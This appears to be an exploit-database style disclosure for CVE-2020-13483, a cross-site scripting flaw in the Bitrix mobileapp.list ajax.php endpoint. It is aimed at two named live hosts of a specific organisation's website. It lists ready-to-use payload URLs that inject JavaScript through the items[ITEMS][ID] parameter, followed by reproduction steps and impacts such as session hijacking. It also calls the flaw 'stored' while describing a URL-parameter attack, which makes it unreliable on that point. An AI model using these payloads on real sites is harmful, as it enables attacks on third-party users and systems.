# Exploit Title: FSB: FOR and AGAINST XSS Vulnerability # Author: Чингис хаан # Product: FSB: FOR and AGAINST # Tested On: Kali Linux # CVE: CVE-2020-13483 # Vulnerability Type: Cross-Site Scripting (XSS) # Severity: Medium # Disclosure Status: Public # Vulnerability Description # https://www.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/ --------------------------------------------------------------------------------------------------- FSB: FOR and AGAINST XSS [CVE-2020-13483] [http] [medium] https://mail.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> [CVE-2020-13483] [http] [medium] https://www.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> The FSB: FOR and AGAINST application is vulnerable to a stored Cross-Site Scripting (XSS) attack via the mobileapp.list component. This vulnerability arises due to insufficient input validation and output encoding in the ajax.php endpoint. An attacker can inject malicious JavaScript code into the items[ITEMS][ID] parameter, which is then executed in the context of the victim's browser when the affected page is loaded. This vulnerability allows an attacker to execute arbitrary JavaScript code, potentially leading to session hijacking, defacement, or unauthorized actions on behalf of the victim. Affected Component The vulnerability exists in the following endpoint: Copy https://www.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/ Proof of Concept (PoC) The following URLs demonstrate the XSS vulnerability by injecting a malicious payload into the items[ITEMS][ID] parameter: Payload 1: Copy https://mail.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> Payload 2: Copy https://www.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> When the above URLs are accessed, the injected JavaScript code (alert(1)) is executed in the victim's browser. Steps to Reproduce Open a web browser and navigate to one of the PoC URLs provided above. Observe that the JavaScript alert(1) is executed, confirming the presence of the XSS vulnerability. Impact Session Hijacking: An attacker can steal session cookies and impersonate the victim. Defacement: An attacker can modify the content of the affected page. Unauthorized Actions: An attacker can perform actions on behalf of the victim, such as changing account settings or making transactions.